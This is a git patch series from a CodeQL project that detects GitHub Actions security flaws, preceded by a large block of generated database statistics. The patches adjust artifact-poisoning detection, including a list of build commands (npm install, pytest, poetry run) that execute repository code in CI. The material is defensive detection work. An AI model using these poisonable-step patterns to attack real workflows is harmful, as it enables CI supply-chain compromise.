+1 + + + + + + +parent +id + + +12 + + +1 +2 
+33 + + +2 +3 +72 + + +3 +4 +2 + + +4 +5 +35 + + +6 +7 +29 + + +8 +11 +14 + + +12 +21 +17 + + +22 +25 +2 + + + + + + +parent +kind + + +12 + + +1 +2 +131 + + +2 +3 +43 + + +3 +4 +30 + + + + + + +parent +idx + + +12 + + +1 +2 +33 + + +2 +3 +72 + + +3 +4 +2 + + +4 +5 +35 + + +6 +7 +29 + + +8 +11 +14 + + +12 +21 +17 + + +22 +25 +2 + + + + + + +parent +tag + + +12 + + +1 +2 +120 + + +2 +3 +41 + + +3 +4 +36 + + +4 +5 +7 + + + + + + +parent +tostring + + +12 + + +1 +2 +33 + + +2 +3 +72 + + +3 +4 +2 + + +4 +5 +35 + + +5 +6 +5 + + +6 +7 +24 + + +8 +11 +14 + + +12 +14 +16 + + +16 +23 +3 + + + + + + +idx +id + + +12 + + +1 +2 +2 + + +2 +3 +2 + + +4 +5 +7 + + +5 +20 +2 + + +20 +25 +2 + + +25 +33 +2 + + +33 +56 +2 + + +61 +64 +2 + + +95 +100 +2 + + +149 +172 +2 + + + + + + +idx +kind + + +12 + + +1 +2 +14 + + +2 +3 +4 + + +3 +4 +6 + + +4 +5 +1 + + + + + + +idx +parent + + +12 + + +1 +2 +2 + + +2 +3 +2 + + +4 +5 +7 + + +5 +20 +2 + + +20 +25 +2 + + +25 +33 +2 + + +33 +56 +2 + + +61 +64 +2 + + +95 +100 +2 + + +149 +172 +2 + + + + + + +idx +tag + + +12 + + +1 +2 +11 + + +2 +3 +5 + + +3 +4 +3 + + +4 +5 +4 + + +6 +7 +2 + + + + + + +idx +tostring + + +12 + + +1 +2 +2 + + +2 +3 +2 + + +3 +4 +3 + + +4 +5 +4 + + +5 +7 +2 + + +7 +11 +2 + + +12 +15 +2 + + +15 +16 +1 + + +18 +19 +2 + + +28 +31 +2 + + +52 +56 +2 + + +87 +88 +1 + + + + + + +tag +id + + +12 + + +1 +2 +2 + + +4 +5 +1 + + +15 +16 +1 + + +26 +27 +1 + + +35 +36 +1 + + +149 +150 +1 + + +654 +655 +1 + + + + + + +tag +kind + + +12 + + +1 +2 +8 + + + + + + +tag +parent + + +12 + + +1 +2 +2 + + +2 +3 +1 + + +3 +4 +1 + + +25 +26 +1 + + +33 +34 +1 + + +90 +91 +1 + + +183 +184 +1 + + + + + + +tag +idx + + +12 + + +1 +2 +2 + + +3 +4 +2 + + +7 +8 +1 + + +9 +10 +1 + + +11 +12 +1 + + +23 +24 +1 + + + + + + +tag +tostring + + +12 + + +1 +2 +3 + + +2 +3 +1 + + +10 +11 +1 + + +13 +14 +1 + + +67 +68 +1 + + +223 +224 +1 + + + + + + +tostring +id + + +12 + + +1 +2 +209 + + +2 +3 +42 + + +3 +6 +29 + + +6 +15 +25 + + +15 +18 +13 + + + + + + 
+tostring +kind + + +12 + + +1 +2 +318 + + + + + + +tostring +parent + + +12 + + +1 +2 +213 + + +2 +3 +41 + + +3 +6 +27 + + +6 +15 +25 + + +15 +18 +12 + + + + + + +tostring +idx + + +12 + + +1 +2 +272 + + +2 +3 +34 + + +3 +10 +12 + + + + + + +tostring +tag + + +12 + + +1 +2 +318 + + + + + + + + +yaml_anchors +1 + + +node +1 + + +anchor +1 + + + + +node +anchor + + +12 + + +1 +2 +1 + + + + + + +anchor +node + + +12 + + +1 +2 +1 + + + + + + + + +yaml_aliases +1 + + +alias +1 + + +target +1 + + + + +alias +target + + +12 + + +1 +2 +1 + + + + + + +target +alias + + +12 + + +1 +2 +1 + + + + + + + + +yaml_scalars +700 + + +scalar +700 + + +style +3 + + +value +241 + + + + +scalar +style + + +12 + + +1 +2 +700 + + + + + + +scalar +value + + +12 + + +1 +2 +700 + + + + + + +style +scalar + + +12 + + +14 +15 +1 + + +97 +98 +1 + + +589 +590 +1 + + + + + + +style +value + + +12 + + +12 +13 +1 + + +47 +48 +1 + + +183 +184 +1 + + + + + + +value +scalar + + +12 + + +1 +2 +158 + + +2 +3 +32 + + +3 +6 +19 + + +6 +15 +20 + + +15 +18 +12 + + + + + + +value +style + + +12 + + +1 +2 +240 + + +2 +3 +1 + + + + + + + + +yaml_errors +id +1 + + +id +1 + + +message +1 + + + + +id +message + + +12 + + +1 +2 +1 + + + + + + +message +id + + +12 + + +1 +2 +1 + + + + + + + + +yaml_locations +71 + + +locatable +71 + + +location +71 + + + + +locatable +location + + +12 + + +1 +2 +71 + + + + + + +location +locatable + + +12 + + +1 +2 +71 + + + + + + + + +xmlEncoding +39724 + + +id +39724 + + +encoding +1 + + + + +id +encoding + + +12 + + +1 +2 +39724 + + + + + + +encoding +id + + +12 + + +39724 +39725 +1 + + + + + + + + +xmlDTDs +1 + + +id +1 + + +root +1 + + +publicId +1 + + +systemId +1 + + +fileid +1 + + + + +id +root + + +12 + + +1 +2 +1 + + + + + + +id +publicId + + +12 + + +1 +2 +1 + + + + + + +id +systemId + + +12 + + +1 +2 +1 + + + + + + +id +fileid + + +12 + + +1 +2 +1 + + + + + + +root +id + + +12 + + +1 +2 +1 + + + + + + +root +publicId + + +12 + + +1 +2 +1 + + + + + + +root +systemId + + 
+12 + + +1 +2 +1 + + + + + + +root +fileid + + +12 + + +1 +2 +1 + + + + + + +publicId +id + + +12 + + +1 +2 +1 + + + + + + +publicId +root + + +12 + + +1 +2 +1 + + + + + + +publicId +systemId + + +12 + + +1 +2 +1 + + + + + + +publicId +fileid + + +12 + + +1 +2 +1 + + + + + + +systemId +id + + +12 + + +1 +2 +1 + + + + + + +systemId +root + + +12 + + +1 +2 +1 + + + + + + +systemId +publicId + + +12 + + +1 +2 +1 + + + + + + +systemId +fileid + + +12 + + +1 +2 +1 + + + + + + +fileid +id + + +12 + + +1 +2 +1 + + + + + + +fileid +root + + +12 + + +1 +2 +1 + + + + + + +fileid +publicId + + +12 + + +1 +2 +1 + + + + + + +fileid +systemId + + +12 + + +1 +2 +1 + + + + + + + + +xmlElements +1270313 + + +id +1270313 + + +name +4655 + + +parentid +578021 + + +idx +35122 + + +fileid +39721 + + + + +id +name + + +12 + + +1 +2 +1270313 + + + + + + +id +parentid + + +12 + + +1 +2 +1270313 + + + + + + +id +idx + + +12 + + +1 +2 +1270313 + + + + + + +id +fileid + + +12 + + +1 +2 +1270313 + + + + + + +name +id + + +12 + + +1 +2 +420 + + +2 +5 +156 + + +5 +6 +3832 + + +6 +310317 +247 + + + + + + +name +parentid + + +12 + + +1 +2 +456 + + +2 +5 +150 + + +5 +6 +3829 + + +6 +161565 +220 + + + + + + +name +idx + + +12 + + +1 +2 +4358 + + +2 +35123 +297 + + + + + + +name +fileid + + +12 + + +1 +2 +486 + + +2 +5 +133 + + +5 +6 +3831 + + +6 +14503 +205 + + + + + + +parentid +id + + +12 + + +1 +2 +371969 + + +2 +3 +62095 + + +3 +4 +104113 + + +4 +35123 +39844 + + + + + + +parentid +name + + +12 + + +1 +2 +500482 + + +2 +3 +17866 + + +3 +4 +49117 + + +4 +45 +10556 + + + + + + +parentid +idx + + +12 + + +1 +2 +371969 + + +2 +3 +62095 + + +3 +4 +104113 + + +4 +35123 +39844 + + + + + + +parentid +fileid + + +12 + + +1 +2 +578021 + + + + + + +idx +id + + +12 + + +2 +3 +606 + + +4 +5 +17851 + + +5 +6 +6533 + + +6 +7 +859 + + +7 +8 +4471 + + +9 +16 +2719 + + +16 +578022 +2083 + + + + + + +idx +name + + +12 + + +1 +2 +18457 + + +2 +3 +6533 + + +3 +4 +6178 + + +4 +8 +2624 + + +8 +4397 +1330 + + + + + + 
+idx +parentid + + +12 + + +2 +3 +606 + + +4 +5 +17851 + + +5 +6 +6533 + + +6 +7 +859 + + +7 +8 +4471 + + +9 +16 +2719 + + +16 +578022 +2083 + + + + + + +idx +fileid + + +12 + + +2 +3 +606 + + +4 +5 +17851 + + +5 +6 +6533 + + +6 +7 +859 + + +7 +8 +4471 + + +9 +16 +2719 + + +16 +39722 +2083 + + + + + + +fileid +id + + +12 + + +1 +2 +20457 + + +2 +3 +3115 + + +3 +7 +3026 + + +7 +8 +3588 + + +8 +9 +2220 + + +9 +11 +3099 + + +11 +19 +3087 + + +19 +114506 +1129 + + + + + + +fileid +name + + +12 + + +1 +2 +20459 + + +2 +3 +3458 + + +3 +5 +2569 + + +5 +7 +2172 + + +7 +8 +6158 + + +8 +9 +3501 + + +9 +46 +1404 + + + + + + +fileid +parentid + + +12 + + +1 +2 +20457 + + +2 +3 +3870 + + +3 +5 +2152 + + +5 +6 +2876 + + +6 +7 +2720 + + +7 +8 +4132 + + +8 +14 +3096 + + +14 +31079 +418 + + + + + + +fileid +idx + + +12 + + +1 +2 +25894 + + +2 +3 +5301 + + +3 +4 +3787 + + +4 +6 +3268 + + +6 +35123 +1471 + + + + + + + + +xmlAttrs +1202020 + + +id +1202020 + + +elementid +760198 + + +name +3649 + + +value +121803 + + +idx +2000 + + +fileid +39448 + + + + +id +elementid + + +12 + + +1 +2 +1202020 + + + + + + +id +name + + +12 + + +1 +2 +1202020 + + + + + + +id +value + + +12 + + +1 +2 +1202020 + + + + + + +id +idx + + +12 + + +1 +2 +1202020 + + + + + + +id +fileid + + +12 + + +1 +2 +1202020 + + + + + + +elementid +id + + +12 + + +1 +2 +425697 + + +2 +3 +249659 + + +3 +4 +66474 + + +4 +2001 +18368 + + + + + + +elementid +name + + +12 + + +1 +2 +425778 + + +2 +3 +249579 + + +3 +4 +66475 + + +4 +2001 +18366 + + + + + + +elementid +value + + +12 + + +1 +2 +466237 + + +2 +3 +266291 + + +3 +46 +27670 + + + + + + +elementid +idx + + +12 + + +1 +2 +425697 + + +2 +3 +249659 + + +3 +4 +66474 + + +4 +2001 +18368 + + + + + + +elementid +fileid + + +12 + + +1 +2 +760198 + + + + + + +name +id + + +12 + + +1 +2 +3467 + + +2 +262475 +182 + + + + + + +name +elementid + + +12 + + +1 +2 +3467 + + +2 +262475 +182 + + + + + + +name +value + + +12 + + +1 +2 +3501 + + +2 +54146 +148 + + + + + + +name +idx + 
+ +12 + + +1 +2 +3531 + + +2 +11 +118 + + + + + + +name +fileid + + +12 + + +1 +2 +3491 + + +2 +21768 +158 + + + + + + +value +id + + +12 + + +1 +2 +72032 + + +2 +3 +42366 + + +3 +199269 +7405 + + + + + + +value +elementid + + +12 + + +1 +2 +72036 + + +2 +3 +42374 + + +3 +199269 +7393 + + + + + + +value +name + + +12 + + +1 +2 +116722 + + +2 +2041 +5081 + + + + + + +value +idx + + +12 + + +1 +2 +117957 + + +2 +2001 +3846 + + + + + + +value +fileid + + +12 + + +1 +2 +86306 + + +2 +3 +28570 + + +3 +4175 +6927 + + + + + + +idx +id + + +12 + + +1 +2 +1955 + + +2 +760199 +45 + + + + + + +idx +elementid + + +12 + + +1 +2 +1955 + + +2 +760199 +45 + + + + + + +idx +name + + +12 + + +1 +2 +1955 + + +2 +189 +45 + + + + + + +idx +value + + +12 + + +1 +2 +1955 + + +2 +116643 +45 + + + + + + +idx +fileid + + +12 + + +1 +2 +1955 + + +2 +39449 +45 + + + + + + +fileid +id + + +12 + + +1 +2 +22884 + + +2 +4 +2565 + + +4 +6 +2294 + + +6 +7 +3299 + + +7 +9 +3272 + + +9 +16 +3143 + + +16 +129952 +1991 + + + + + + +fileid +elementid + + +12 + + +1 +2 +23890 + + +2 +4 +2131 + + +4 +5 +1971 + + +5 +6 +4096 + + +6 +8 +3519 + + +8 +16 +3137 + + +16 +106600 +704 + + + + + + +fileid +name + + +12 + + +1 +2 +22946 + + +2 +3 +2338 + + +3 +4 +2726 + + +4 +5 +2824 + + +5 +6 +2994 + + +6 +7 +3876 + + +7 +2002 +1744 + + + + + + +fileid +value + + +12 + + +1 +2 +22916 + + +2 +4 +2772 + + +4 +5 +2112 + + +5 +6 +3510 + + +6 +8 +1993 + + +8 +11 +3365 + + +11 +50357 +2780 + + + + + + +fileid +idx + + +12 + + +1 +2 +26133 + + +2 +3 +9699 + + +3 +5 +3511 + + +5 +2001 +105 + + + + + + + + +xmlNs +71201 + + +id +4185 + + +prefixName +958 + + +URI +4185 + + +fileid +39544 + + + + +id +prefixName + + +12 + + +1 +2 +2602 + + +2 +3 +1553 + + +3 +872 +30 + + + + + + +id +URI + + +12 + + +1 +2 +4185 + + + + + + +id +fileid + + +12 + + +1 +6 +274 + + +6 +7 +3825 + + +7 +24905 +86 + + + + + + +prefixName +id + + +12 + + +1 +2 +915 + + +2 +4054 +43 + + + + + + +prefixName +URI + + +12 + + +1 +2 +915 + + +2 +4054 
+43 + + + + + + +prefixName +fileid + + +12 + + +1 +2 +828 + + +2 +5 +73 + + +5 +24903 +57 + + + + + + +URI +id + + +12 + + +1 +2 +4185 + + + + + + +URI +prefixName + + +12 + + +1 +2 +2602 + + +2 +3 +1553 + + +3 +872 +30 + + + + + + +URI +fileid + + +12 + + +1 +6 +274 + + +6 +7 +3825 + + +7 +24905 +86 + + + + + + +fileid +id + + +12 + + +1 +2 +11655 + + +2 +3 +26146 + + +3 +8 +1743 + + + + + + +fileid +prefixName + + +12 + + +1 +2 +11653 + + +2 +3 +25982 + + +3 +31 +1909 + + + + + + +fileid +URI + + +12 + + +1 +2 +11655 + + +2 +3 +26146 + + +3 +8 +1743 + + + + + + + + +xmlHasNs +1139730 + + +elementId +1139730 + + +nsId +4136 + + +fileid +39537 + + + + +elementId +nsId + + +12 + + +1 +2 +1139730 + + + + + + +elementId +fileid + + +12 + + +1 +2 +1139730 + + + + + + +nsId +elementId + + +12 + + +1 +5 +234 + + +5 +6 +3824 + + +6 +643289 +78 + + + + + + +nsId +fileid + + +12 + + +1 +5 +257 + + +5 +6 +3823 + + +6 +24759 +56 + + + + + + +fileid +elementId + + +12 + + +1 +2 +3669 + + +2 +3 +20429 + + +3 +7 +2536 + + +7 +8 +3473 + + +8 +9 +2258 + + +9 +11 +3036 + + +11 +18 +2966 + + +18 +147552 +1170 + + + + + + +fileid +nsId + + +12 + + +1 +2 +18261 + + +2 +3 +21032 + + +3 +8 +244 + + + + + + + + +xmlComments +26812 + + +id +26812 + + +text +22933 + + +parentid +26546 + + +fileid +26368 + + + + +id +text + + +12 + + +1 +2 +26812 + + + + + + +id +parentid + + +12 + + +1 +2 +26812 + + + + + + +id +fileid + + +12 + + +1 +2 +26812 + + + + + + +text +id + + +12 + + +1 +2 +21517 + + +2 +62 +1416 + + + + + + +text +parentid + + +12 + + +1 +2 +21519 + + +2 +62 +1414 + + + + + + +text +fileid + + +12 + + +1 +2 +21522 + + +2 +62 +1411 + + + + + + +parentid +id + + +12 + + +1 +2 +26379 + + +2 +17 +167 + + + + + + +parentid +text + + +12 + + +1 +2 +26379 + + +2 +17 +167 + + + + + + +parentid +fileid + + +12 + + +1 +2 +26546 + + + + + + +fileid +id + + +12 + + +1 +2 +26161 + + +2 +17 +207 + + + + + + +fileid +text + + +12 + + +1 +2 +26165 + + +2 +17 +203 + + + + + + +fileid +parentid 
+ + +12 + + +1 +2 +26223 + + +2 +10 +145 + + + + + + + + +xmlChars +439958 + + +id +439958 + + +text +100518 + + +parentid +433851 + + +idx +4 + + +isCDATA +1 + + +fileid +26494 + + + + +id +text + + +12 + + +1 +2 +439958 + + + + + + +id +parentid + + +12 + + +1 +2 +439958 + + + + + + +id +idx + + +12 + + +1 +2 +439958 + + + + + + +id +isCDATA + + +12 + + +1 +2 +439958 + + + + + + +id +fileid + + +12 + + +1 +2 +439958 + + + + + + +text +id + + +12 + + +1 +2 +60389 + + +2 +4 +3811 + + +4 +5 +29257 + + +5 +23171 +7061 + + + + + + +text +parentid + + +12 + + +1 +2 +60389 + + +2 +4 +3811 + + +4 +5 +29257 + + +5 +23171 +7061 + + + + + + +text +idx + + +12 + + +1 +2 +100517 + + +2 +3 +1 + + + + + + +text +isCDATA + + +12 + + +1 +2 +100518 + + + + + + +text +fileid + + +12 + + +1 +2 +61284 + + +2 +4 +4205 + + +4 +5 +28328 + + +5 +351 +6701 + + + + + + +parentid +id + + +12 + + +1 +2 +429716 + + +2 +5 +4135 + + + + + + +parentid +text + + +12 + + +1 +2 +429716 + + +2 +5 +4135 + + + + + + +parentid +idx + + +12 + + +1 +2 +429716 + + +2 +5 +4135 + + + + + + +parentid +isCDATA + + +12 + + +1 +2 +433851 + + + + + + +parentid +fileid + + +12 + + +1 +2 +433851 + + + + + + +idx +id + + +12 + + +80 +81 +1 + + +1892 +1893 +1 + + +4135 +4136 +1 + + +433851 +433852 +1 + + + + + + +idx +text + + +12 + + +1 +2 +1 + + +3 +4 +1 + + +16 +17 +1 + + +100499 +100500 +1 + + + + + + +idx +parentid + + +12 + + +80 +81 +1 + + +1892 +1893 +1 + + +4135 +4136 +1 + + +433851 +433852 +1 + + + + + + +idx +isCDATA + + +12 + + +1 +2 +4 + + + + + + +idx +fileid + + +12 + + +4 +5 +1 + + +46 +47 +1 + + +97 +98 +1 + + +26494 +26495 +1 + + + + + + +isCDATA +id + + +12 + + +439958 +439959 +1 + + + + + + +isCDATA +text + + +12 + + +100518 +100519 +1 + + + + + + +isCDATA +parentid + + +12 + + +433851 +433852 +1 + + + + + + +isCDATA +idx + + +12 + + +4 +5 +1 + + + + + + +isCDATA +fileid + + +12 + + +26494 +26495 +1 + + + + + + +fileid +id + + +12 + + +1 +2 +25303 + + +2 +35123 +1191 + + + + + + +fileid +text + + 
+12 + + +1 +2 +25765 + + +2 +35123 +729 + + + + + + +fileid +parentid + + +12 + + +1 +2 +25312 + + +2 +35123 +1182 + + + + + + +fileid +idx + + +12 + + +1 +2 +26397 + + +2 +5 +97 + + + + + + +fileid +isCDATA + + +12 + + +1 +2 +26494 + + + + + + + + +xmllocations +3051056 + + +xmlElement +2982460 + + +location +3051056 + + + + +xmlElement +location + + +12 + + +1 +2 +2978326 + + +2 +24903 +4134 + + + + + + +location +xmlElement + + +12 + + +1 +2 +3051056 + + + + + + + + +filetype +1102 + + +file +1102 + + +filetype +3 + + + + +file +filetype + + +12 + + +1 +2 +1102 + + + + + + +filetype +file + + +12 + + +1 +2 +1 + + +162 +163 +1 + + +939 +940 +1 + + + + + + + + +configs +69795 + + +id +69795 + + + + + +configNames +69794 + + +id +69794 + + +config +69794 + + +name +12859 + + + + +id +config + + +12 + + +1 +2 +69794 + + + + + + +id +name + + +12 + + +1 +2 +69794 + + + + + + +config +id + + +12 + + +1 +2 +69794 + + + + + + +config +name + + +12 + + +1 +2 +69794 + + + + + + +name +id + + +12 + + +1 +2 +4858 + + +2 +3 +593 + + +3 +4 +2806 + + +4 +10 +169 + + +10 +11 +1900 + + +11 +12 +1757 + + +12 +111 +776 + + + + + + +name +config + + +12 + + +1 +2 +4858 + + +2 +3 +593 + + +3 +4 +2806 + + +4 +10 +169 + + +10 +11 +1900 + + +11 +12 +1757 + + +12 +111 +776 + + + + + + + + +configValues +69691 + + +id +69691 + + +config +69691 + + +value +54399 + + + + +id +config + + +12 + + +1 +2 +69691 + + + + + + +id +value + + +12 + + +1 +2 +69691 + + + + + + +config +id + + +12 + + +1 +2 +69691 + + + + + + +config +value + + +12 + + +1 +2 +69691 + + + + + + +value +id + + +12 + + +1 +2 +48220 + + +2 +4 +4804 + + +4 +546 +1375 + + + + + + +value +config + + +12 + + +1 +2 +48220 + + +2 +4 +4804 + + +4 +546 +1375 + + + + + + + + +configLocations +209280 + + +locatable +209280 + + +location +209280 + + + + +locatable +location + + +12 + + +1 +2 +209280 + + + + + + +location +locatable + + +12 + + +1 +2 +209280 + + + + + + + + +extraction_time +378 + + +file +21 + + +extractionPhase +9 
+ + +timerKind +2 + + +time +43 + + + + +file +extractionPhase + + +12 + + +9 +10 +21 + + + + + + +file +timerKind + + +12 + + +2 +3 +21 + + + + + + +file +time + + +12 + + +3 +4 +21 + + + + + + +extractionPhase +file + + +12 + + +21 +22 +9 + + + + + + +extractionPhase +timerKind + + +12 + + +2 +3 +9 + + + + + + +extractionPhase +time + + +12 + + +1 +2 +8 + + +42 +43 +1 + + + + + + +timerKind +file + + +12 + + +21 +22 +2 + + + + + + +timerKind +extractionPhase + + +12 + + +9 +10 +2 + + + + + + +timerKind +time + + +12 + + +22 +23 +2 + + + + + + +time +file + + +12 + + +1 +2 +42 + + +21 +22 +1 + + + + + + +time +extractionPhase + + +12 + + +1 +2 +42 + + +8 +9 +1 + + + + + + +time +timerKind + + +12 + + +1 +2 +42 + + +2 +3 +1 + + + + + + + + +extraction_data +21 + + +file +21 + + +cacheFile +21 + + +fromCache +1 + + +length +21 + + + + +file +cacheFile + + +12 + + +1 +2 +21 + + + + + + +file +fromCache + + +12 + + +1 +2 +21 + + + + + + +file +length + + +12 + + +1 +2 +21 + + + + + + +cacheFile +file + + +12 + + +1 +2 +21 + + + + + + +cacheFile +fromCache + + +12 + + +1 +2 +21 + + + + + + +cacheFile +length + + +12 + + +1 +2 +21 + + + + + + +fromCache +file + + +12 + + +21 +22 +1 + + + + + + +fromCache +cacheFile + + +12 + + +21 +22 +1 + + + + + + +fromCache +length + + +12 + + +21 +22 +1 + + + + + + +length +file + + +12 + + +1 +2 +21 + + + + + + +length +cacheFile + + +12 + + +1 +2 +21 + + + + + + +length +fromCache + + +12 + + +1 +2 +21 + + + + + + + + + diff --git a/ql/test/codeql-pack.lock.yml b/ql/test/codeql-pack.lock.yml index 82795df00063..4b8239b7f6ca 100644 --- a/ql/test/codeql-pack.lock.yml +++ b/ql/test/codeql-pack.lock.yml 
@@ -5,22 +5,12 @@ dependencies: version: 1.0.0 codeql/dataflow: version: 1.0.0 - codeql/javascript-all: - version: 1.0.0 - codeql/mad: - version: 1.0.0 - codeql/regex: - version: 1.0.0 codeql/ssa: version: 1.0.0 - codeql/tutorial: - version: 1.0.0 codeql/typetracking: version: 1.0.0 codeql/util: version: 1.0.0 - codeql/xml: - version: 1.0.0 codeql/yaml: version: 1.0.0 compiled: false From ceac1c6392ff107ed5aea4a819f17abf7bfed141 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 13 Jun 2024 11:50:53 +0200 Subject: [PATCH 335/707] Do not scan JS files --- .github/action/dist/index.js | 1 + .github/action/src/codeql.ts | 1 + 2 files changed, 2 insertions(+) diff --git a/.github/action/dist/index.js b/.github/action/dist/index.js index 7bb3039fe486..240921205600 100644 --- a/.github/action/dist/index.js +++ b/.github/action/dist/index.js @@ -28684,6 +28684,7 @@ async function codeqlDatabaseCreate(codeql) { } var database_path = path.join(temp, "codeql-actions-db"); var source_root = codeql.source_root || process.env["GITHUB_WORKSPACE"] || "./"; + source_root = path.join(source_root, "**", "*.yml"); await runCommand(codeql, [ "database", "create", diff --git a/.github/action/src/codeql.ts b/.github/action/src/codeql.ts index 08c4b420a4ca..fe2f9b490298 100644 --- a/.github/action/src/codeql.ts +++ b/.github/action/src/codeql.ts @@ -121,6 +121,7 @@ export async function codeqlDatabaseCreate( var database_path = path.join(temp, "codeql-actions-db"); var source_root = codeql.source_root || process.env["GITHUB_WORKSPACE"] || "./"; + source_root = path.join(source_root, "**", "*.yml"); await runCommand(codeql, [ "database", From a84c1c4706b4fcce446e96aa7ddd6befdc6d9265 Mon Sep 17 00:00:00 2001 
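Review bot: `path.join(source_root, "**", "*.yml")` produces a literal path containing glob characters, and if that value is what gets passed to `codeql database create` as the source root (the argument list continues outside the hunk), the CLI will look for a directory literally named `**/*.yml` rather than expand the pattern, so the database is likely empty or the command fails; it also silently excludes `.yaml` workflows. Restricting what is indexed is better done with the extractor/config-level path filters (for example `paths`/`paths-ignore` in a CodeQL config file) than by rewriting the source root. `codeqlDatabaseCreate` starts before this hunk and continues after it, and the same line is mirrored in the generated `dist/index.js` bundle; the later commit in this series (bdaab69) reverts both.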
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 13 Jun 2024 11:51:15 +0200 Subject: [PATCH 336/707] Minor improvemnts --- .../actions/security/ArtifactPoisoningQuery.qll | 13 +++++++------ ql/lib/codeql/actions/security/PoisonableSteps.qll | 5 +++-- 2 files changed, 10 insertions(+), 8 deletions(-) diff --git a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll index 45d9a08d00ab..060471bb5dce 100644 --- a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll @@ -20,12 +20,13 @@ class DownloadArtifactActionStep extends UntrustedArtifactDownloadStep, UsesStep DownloadArtifactActionStep() { this.getCallee() = [ - "dawidd6/action-download-artifact", "marcofaggian/action-download-multiple-artifacts", - "benday-inc/download-latest-artifact", "blablacar/action-download-last-artifact", - "levonet/action-download-last-artifact", "bettermarks/action-artifact-download", - "aochmann/actions-download-artifact", "cytopia/download-artifact-retry-action", - "alextompkins/download-prior-artifact", "nmerget/download-gzip-artifact", - "benday-inc/download-artifact", "synergy-au/download-workflow-artifacts-action", + "actions/download-artifact", "dawidd6/action-download-artifact", + "marcofaggian/action-download-multiple-artifacts", "benday-inc/download-latest-artifact", + "blablacar/action-download-last-artifact", "levonet/action-download-last-artifact", + "bettermarks/action-artifact-download", "aochmann/actions-download-artifact", + "cytopia/download-artifact-retry-action", "alextompkins/download-prior-artifact", + "nmerget/download-gzip-artifact", "benday-inc/download-artifact", + "synergy-au/download-workflow-artifacts-action", "ishworkh/docker-image-artifact-download", "ishworkh/container-image-artifact-download", "sidx1024/action-download-artifact", "hyperskill/azblob-download-artifact", "ma-ve/action-download-artifact-with-retry" ] and 
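Review bot: Adding `"actions/download-artifact"` unconditionally to this callee list marks every use of the official action as an untrusted download, but without a `run-id`/`github-token` pair the action can presumably only fetch artifacts produced by the same workflow run, which are not the cross-run, attacker-influenced artifacts this class appears to model, so the change will raise findings on ordinary build-to-test artifact hand-offs. Consider gating the official action on `exists(this.getArgument("run-id"))` together with `exists(this.getArgument("github-token"))`, or giving it its own class with a comment explaining why only the cross-run form is untrusted (the later commit in this series, 1fdf76a, does the latter). The rest of the constructor continues outside the hunk.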
diff --git a/ql/lib/codeql/actions/security/PoisonableSteps.qll b/ql/lib/codeql/actions/security/PoisonableSteps.qll index 3349b5b11215..f80f09a32d8c 100644 --- a/ql/lib/codeql/actions/security/PoisonableSteps.qll +++ b/ql/lib/codeql/actions/security/PoisonableSteps.qll @@ -19,10 +19,11 @@ class DangerousActionUsesStep extends PoisonableStep, UsesStep { private string dangerousCommands() { result = [ - "npm install", "npm run ", "yarn ", "npm ci(\\b|$)", "make ", "terraform plan", + "npm i(nstall)?(\\b|$)", "npm run ", "yarn ", "npm ci(\\b|$)", "make ", "terraform plan", "terraform apply", "gomplate ", "pre-commit run", "pre-commit install", "go generate", "msbuild ", "mvn ", "gradle ", "bundle install", "bundle exec ", "^ant ", "mkdocs build", - "pytest", "pip install -r ", "pip install --requirement", "java -jar " + "pytest", "pip install -r ", "pip install --requirement", "java -jar ", "poetry install", + "poetry run" ] } From 4b4901f99f5c16ee1510ad16598a70b667ff875d Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 13 Jun 2024 11:51:46 +0200 Subject: [PATCH 337/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 6a247cee330f..33c43429bd62 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.1.0 +version: 0.1.1 dependencies: codeql/util: ^1.0.0 codeql/yaml: ^1.0.0 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 05f3408c578d..75624d6f1995 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: githubsecuritylab/actions-queries -version: 0.1.0 +version: 0.1.1 groups: [actions, queries] suites: codeql-suites extractor: javascript From bdaab69d0bb098395107c6300998c2d128c3e5e2 Mon Sep 17 00:00:00 2001 
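Review bot: `dangerousCommands` carries no QLDoc, and the list now mixes regex fragments (`"npm i(nstall)?(\\b|$)"`, `"npm ci(\\b|$)"`) with bare prefixes such as `"poetry install"` and `"poetry run"`, so a reader cannot tell from the hunk that every entry is treated as a regular expression or that the trailing space on entries like `"npm run "` and `"bundle exec "` is deliberate. Suggest a comment above the predicate such as `/** Unanchored regex fragments for build/test commands that execute repository-controlled code (install hooks, Makefiles, test suites). */`. Because the fragments are unanchored at the start, `npm i(nstall)?` also matches inside `pnpm install`, which is probably desirable but worth stating explicitly. Whether the new `poetry run` entry needs a trailing space or `\\b` like its siblings depends on the matching predicate, which lives outside this hunk.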
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 13 Jun 2024 15:09:37 +0200 Subject: [PATCH 338/707] Do not uses globs for source-root --- .github/action/dist/index.js | 1 - .github/action/src/codeql.ts | 1 - 2 files changed, 2 deletions(-) diff --git a/.github/action/dist/index.js b/.github/action/dist/index.js index 240921205600..7bb3039fe486 100644 --- a/.github/action/dist/index.js +++ b/.github/action/dist/index.js @@ -28684,7 +28684,6 @@ async function codeqlDatabaseCreate(codeql) { } var database_path = path.join(temp, "codeql-actions-db"); var source_root = codeql.source_root || process.env["GITHUB_WORKSPACE"] || "./"; - source_root = path.join(source_root, "**", "*.yml"); await runCommand(codeql, [ "database", "create", diff --git a/.github/action/src/codeql.ts b/.github/action/src/codeql.ts index fe2f9b490298..08c4b420a4ca 100644 --- a/.github/action/src/codeql.ts +++ b/.github/action/src/codeql.ts @@ -121,7 +121,6 @@ export async function codeqlDatabaseCreate( var database_path = path.join(temp, "codeql-actions-db"); var source_root = codeql.source_root 